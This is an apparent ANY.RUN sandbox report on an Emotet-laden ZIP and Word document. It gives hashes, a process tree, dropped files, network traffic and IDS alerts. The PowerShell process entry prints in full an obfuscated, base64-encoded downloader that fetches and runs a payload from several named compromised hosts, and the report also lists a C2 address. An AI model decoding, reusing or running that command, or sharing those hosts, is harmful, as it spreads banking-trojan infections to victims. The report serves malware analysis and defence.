analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

List RRU264.zip

Full analysis: https://app.any.run/tasks/6be90e68-0d90-46e3-aa80-8e31b9d80158
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 19, 2020, 21:36:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
loader
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5:

095D6FF33E377E9AA5606212BE39C65C

SHA1:

EFBF4D28F3E34F58CE0E2AF2BB1DF1C7730E5528

SHA256:

DD1040758858020BC270A4C153E52EF82E1A0D17F66E55EF90FA50CAD7364812

SSDEEP:

1536:4DMmMX6sqA1t4oG+GBYgKQjeox7OhkSDzC1eiZSBqpE1QUjAEkAQ8J9gzT/lJ4:4DMmMXlhGBYcjDxiZIYsWQUHzJ9KT/lW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 2084)
    • EMOTET was detected

      • FM20ENU.exe (PID: 3464)
    • Application was dropped or rewritten from another process

      • S8jkacs.exe (PID: 1700)
      • FM20ENU.exe (PID: 3464)
    • Connects to CnC server

      • FM20ENU.exe (PID: 3464)
    • Changes the autorun value in the registry

      • FM20ENU.exe (PID: 3464)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2084)
    • Executed via WMI

      • POwersheLL.exe (PID: 1628)
      • S8jkacs.exe (PID: 1700)
    • PowerShell script executed

      • POwersheLL.exe (PID: 1628)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 1628)
    • Executable content was dropped or overwritten

      • S8jkacs.exe (PID: 1700)
    • Starts itself from another location

      • S8jkacs.exe (PID: 1700)
    • Connects to server without host name

      • FM20ENU.exe (PID: 3464)
    • Reads Internet Cache Settings

      • FM20ENU.exe (PID: 3464)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3156)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3156)
    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 1628)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: List RRU264.doc
ZipUncompressedSize: 164933
ZipCompressedSize: 73093
ZipCRC: 0x8fec287f
ZipModifyDate: 2020:10:17 01:52:00
ZipCompression: Unknown (99)
ZipBitFlag: 0x0003
ZipRequiredVersion: 51
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
5
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs powershell.exe s8jkacs.exe #EMOTET fm20enu.exe

Process information

PID
CMD
Path
Indicators
Parent process
2084"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\List RRU264.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3156"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2084.24377\List RRU264.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1628POwersheLL -ENCOD JABGAG0AZAA2AF8AZQBiAD0AKAAnAFAAJwArACgAJwB3AGUAJwArACcAZQAzAHUAOAAnACkAKQA7ACQAQwBqAGkAYQB0AHgAMQA9ACQARgB0AGoAYgB3AGIAMgAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQASAAzAGEANQBxAGEAOQA7ACQARAB0ADQAaAB0ADcAbgA9ACgAJwBJACcAKwAoACcAaQBiACcAKwAnADIAMAAwACcAKQArACcAYgAnACkAOwBbAHMAeQBzAHQAZQBtAC4AaQBvAC4AZABpAHIAZQBjAHQAbwByAHkAXQA6ADoAIgBDAGAAUgBlAEEAdABFAGQAaQBgAFIARQBDAGAAVABPAHIAeQAiACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBZACcAKwAoACcAbQAnACsAJwBxAHgAbQAnACkAKwAnAGMAYwB7ADAAfQBSAHIAJwArACgAJwBsACcAKwAnAGkAcAAnACkAKwAnADgAZgB7ADAAJwArACcAfQAnACkAIAAgAC0AZgBbAEMAaABhAFIAXQA5ADIAKQApADsAJABQAGYAYQA3AHkAZABkAD0AKAAnAFAAMgAnACsAJwB1AGkAJwArACgAJwBlACcAKwAnAGgAMwAnACkAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABjAFUAcgBpAHQAeQBgAHAAcgBvAGAAVABPAGMAYABPAEwAIgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAIgB0AEwAYABzADEAMgAiADsAJABSADAAXwBpADMAegB3AD0AKAAoACcARQAnACsAJwBxADIAbgAnACkAKwAnAGEAJwArACcAYQBvACcAKQA7ACQASwBuAHUAegBsADIAagAgAD0AIAAoACgAJwBTACcAKwAnADgAagBrAGEAJwArACcAYwAnACkAKwAnAHMAJwApADsAJABLAHgAeAAzAG0AZgB6AD0AKAAoACcATQBzACcAKwAnAGMAJwApACsAKAAnAF8AMAA0ACcAKwAnAG4AJwApACkAOwAkAE8AeQAxAGgAbgAyAGYAPQAoACgAJwBKAGgAdAAnACsAJwBoACcAKQArACcAMAAnACsAJwByAHUAJwApADsAJABVADAAOABoAG8AYgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAVQA4AGcAJwArACcAWQBtACcAKwAnAHEAeABtAGMAYwAnACkAKwAnAFUAJwArACgAJwA4ACcAKwAnAGcAUgAnACkAKwAnAHIAbAAnACsAJwBpACcAKwAnAHAAJwArACgAJwA4ACcAKwAnAGYAVQA4AGcAJwApACkALgAiAHIAZQBQAGwAYABBAGAAYwBlACIAKAAoAFsAQwBoAGEAUgBdADgANQArAFsAQwBoAGEAUgBdADUANgArAFsAQwBoAGEAUgBdADEAMAAzACkALABbAFMAVAByAEkAbgBHAF0AWwBDAGgAYQBSAF0AOQAyACkAKQArACQASwBuAHUAegBsADIAagArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAEwAMAA1AGUAYwA1AGEAPQAoACgAJwBUAHgAJwArACcAOAAnACkAKwAoACcAcwA5ACcAKwAnAG8AbwAnACkAKQA7ACQAVQBpADkAZABoAGwAZQA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAQgBjAGwAaQBFAE4AdAA7ACQAVAA3AHAAcwBpAHUANQA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAcwAnACkAKwAoACcAOgAvAC8AcwAnACsAJwBoAHIAbwAnACkAKwAoACcAbwBvAGsAJwArACcALgAnACkAKwAoACcAYwBvACcAKwAnAG0AJwApACsAKAAnAC8AZABvACcAKwAnAC0AaQAnACkAKwAoACcAdAAvACcAKwAnAEIAUQAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAJwA0ACcAKwAoACcAawB3ACcAKwAnAGEAJwApACsAKAAnAGwAbAAnACsAJwBwAGEAJwApACsAKAAnAHAAZQByACcAKwAnAGQAJwApACsAKAAnAG8AJwArACcAdwBuAGwAJwApACsAKAAnAG8AJwArACcAYQBkAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAoACcAdwBwAC0AJwArACcAYQAnACkAKwAoACcAZAAnACsAJwBtAGkAJwApACsAJwBuACcAKwAnAC8AJwArACgAJwBFACcAKwAnAFQALwAnACkAKwAnACoAaAAnACsAJwB0AHQAJwArACgAJwBwAHMAOgAvAC8AYgByAGEAJwArACcAaABtACcAKwAnAGEAJwApACsAKAAnAG4AJwArACcAaQBtACcAKQArACcAZQB0ACcAKwAnAGEAJwArACcAbAAnACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0AJwArACcALwBoAG8AcgAnACkAKwAoACcAaQAnACsAJwB6AG8AbgAnACkAKwAoACcALQB0AHIAJwArACcAYQBuACcAKQArACgAJwBzAHAAbwByACcAKwAnAHQALwAnACkAKwAoACcAZAAvACoAJwArACcAaAB0ACcAKQArACgAJwB0AHAAJwArACcAOgAnACkAKwAoACcALwAvACcAKwAnAHIAZQBzACcAKQArACgAJwB1AGMAbwAuACcAKwAnAG4AZQB0ACcAKQArACgAJwAvAGIAJwArACcAYQBjAGsAJwApACsAKAAnAHUAcAAvACcAKwAnAGsAJwApACsAJwB4AGYAJwArACcALwAnACsAKAAnACoAaAB0AHQAcAAnACsAJwBzADoALwAvACcAKwAnAG8AJwArACcAcABsACcAKQArACgAJwB1AG4AZwAnACsAJwBpACcAKwAnAHAAaABvAG4AJwApACsAKAAnAGUALgBuAGUAdAAvACcAKwAnAHcAJwApACsAKAAnAHAALQBhACcAKwAnAGQAJwApACsAJwBtACcAKwAoACcAaQBuAC8AJwArACcATgB4AC8AKgBoACcAKwAnAHQAdABwAHMAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAJwBsAHUAJwArACgAJwBkAHcAJwArACcAaQAnACkAKwAnAGcAJwArACgAJwBtACcAKwAnAG8AZAAnACsAJwBlAGwALgAnACkAKwAoACcAbgAnACsAJwBlAHQALwAnACsAJwB3AHAAJwArACcALQBhAGQAJwApACsAJwBtACcAKwAoACcAaQBuAC8AJwArACcAaQAvACcAKQArACgAJwAqAGgAJwArACcAdAB0AHAAcwA6ACcAKwAnAC8ALwAnACkAKwAnAGEAJwArACcAcgAnACsAJwBrAGEAJwArACcAbgAnACsAJwAtAG0AJwArACgAJwBlAG0AYQByACcAKwAnAC4AJwApACsAKAAnAGMAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGMAJwApACsAJwBvACcAKwAnAG4AJwArACgAJwB0AGUAbgB0ACcAKwAnAC8AJwApACsAKAAnAGcARwAnACsAJwAvACcAKQApAC4AIgBzAHAAbABgAGkAVAAiACgAJABPAG4AMgBtAG4AawB5ACAAKwAgACQAQwBqAGkAYQB0AHgAMQAgACsAIAAkAE0AYwBwAGUAdwByAGYAKQA7ACQAWQByAHUAXwBfAGkANQA9ACgAKAAnAFEAJwArACcAegByADIANQAnACkAKwAnAHkAJwArACcAeAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFkANgAwAGgAbwBfAHYAIABpAG4AIAAkAFQANwBwAHMAaQB1ADUAKQB7AHQAcgB5AHsAJABVAGkAOQBkAGgAbABlAC4AIgBEAGAAbwBXAGAATgBsAG8AQQBEAGYAaQBgAEwARQAiACgAJABZADYAMABoAG8AXwB2ACwAIAAkAFUAMAA4AGgAbwBiAHoAKQA7ACQAVgB3AHkAdgAyAGgAagA9ACgAJwBIAGUAJwArACcAeAAnACsAKAAnAGEAcAAnACsAJwA4AHAAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAVQAwADgAaABvAGIAegApAC4AIgBsAGAAZQBuAEcAdABIACIAIAAtAGcAZQAgADIANgA0ADAAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwAnACsAJwBpACcAKwAnAG4AMwAyAF8AUAAnACkAKwAnAHIAbwAnACsAKAAnAGMAZQBzACcAKwAnAHMAJwApACkAKQAuACIAYwBgAFIAZQBBAFQAZQAiACgAJABVADAAOABoAG8AYgB6ACkAOwAkAFgAdQByADUAbwA5AGwAPQAoACgAJwBBAHoAJwArACcAegA1ACcAKQArACcAOQAnACsAJwA2ADUAJwApADsAYgByAGUAYQBrADsAJABLAGsAYQA1AHUAaQAyAD0AKAAoACcASwB6ADYAdwAnACsAJwA1AGsAJwApACsAJwAyACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgBqADkAZABmAGcAcAA9ACgAKAAnAEoAYgAnACsAJwAxAHQAdQAnACkAKwAnAG0AbgAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1700C:\Users\admin\Ymqxmcc\Rrlip8f\S8jkacs.exeC:\Users\admin\Ymqxmcc\Rrlip8f\S8jkacs.exe
wmiprvse.exe
User:
admin
Company:
Steffen Lange
Integrity Level:
MEDIUM
Description:
Password Changer
Exit code:
0
Version:
1.0.0.1
3464"C:\Users\admin\AppData\Local\fdSSDP\FM20ENU.exe"C:\Users\admin\AppData\Local\fdSSDP\FM20ENU.exe
S8jkacs.exe
User:
admin
Company:
Steffen Lange
Integrity Level:
MEDIUM
Description:
Password Changer
Version:
1.0.0.1
Total events
2 568
Read events
1 669
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9D2F.tmp.cvr
MD5:
SHA256:
1628POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0V7P2UNFZGMMEEFIW5Z8.temp
MD5:
SHA256:
1628POwersheLL.exeC:\Users\admin\Ymqxmcc\Rrlip8f\S8jkacs.exe
MD5:
SHA256:
2084WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2084.24377\List RRU264.docdocument
MD5:95B5058AF4AC9132E087EDD2E14CDAED
SHA256:4BD01A5AA1D997804821B42665124F2FD7799102613BF0BC2E7EED3BAC76543D
1628POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2da9c2.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
3156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2084.24377\~$st RRU264.docpgc
MD5:5EBA00E053DF44FAFD70F73A8FF00372
SHA256:4A789CB56C0615FDA7EBE45F9FA333B02318328938806DA8CB51D5BE1F41E6E8
3156WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:82392CCAC8400679A9FE4A4D8670501A
SHA256:5AB35F3E9D350F73504A2B062402F8B10965F797C22AEE073020D0EADAF362DB
1628POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
1700S8jkacs.exeC:\Users\admin\AppData\Local\fdSSDP\FM20ENU.exeexecutable
MD5:684BA2EA81A8E9AB031260CBF0DD5DB8
SHA256:B84AEC9644511A431FFD2637B1DEAAAB671EDFC0F3C98CC9E3CC1E67D9BE71A5
3156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:87097FE2E0E7ED4FF32156D75D92C25A
SHA256:32D8B10FB99E467E4D02683BB9EEC831BEFCECD28F2BB648F0EB4FC85605D67B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1628
POwersheLL.exe
GET
200
14.177.232.31:80
http://resuco.net/backup/kxf/
VN
executable
361 Kb
suspicious
1628
POwersheLL.exe
GET
200
148.251.129.209:80
http://4kwallpaperdownload.com/cgi-sys/suspendedpage.cgi
DE
html
7.46 Kb
suspicious
3464
FM20ENU.exe
POST
200
2.45.176.233:80
http://2.45.176.233/ZvBZcrx/Ubvg2FJJiK6Q/9hrxK4LRkX/p65p0RakwXeNS/
IT
binary
132 b
malicious
1628
POwersheLL.exe
GET
302
148.251.129.209:80
http://4kwallpaperdownload.com/wp-admin/ET/
DE
html
682 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1628
POwersheLL.exe
172.67.145.175:443
shroook.com
US
unknown
1628
POwersheLL.exe
148.251.129.209:80
4kwallpaperdownload.com
Hetzner Online GmbH
DE
suspicious
1628
POwersheLL.exe
172.67.132.252:443
brahmanimetal.com
US
suspicious
1628
POwersheLL.exe
14.177.232.31:80
resuco.net
VNPT Corp
VN
suspicious
3464
FM20ENU.exe
2.45.176.233:80
Vodafone Italia S.p.A.
IT
malicious

DNS requests

Domain
IP
Reputation
shroook.com
  • 172.67.145.175
  • 104.27.154.111
  • 104.27.155.111
unknown
4kwallpaperdownload.com
  • 148.251.129.209
suspicious
brahmanimetal.com
  • 172.67.132.252
  • 104.28.6.80
  • 104.28.7.80
suspicious
resuco.net
  • 14.177.232.31
suspicious

Threats

PID
Process
Class
Message
1628
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1628
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1628
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3464
FM20ENU.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
1 ETPRO signatures available at the full report
No debug info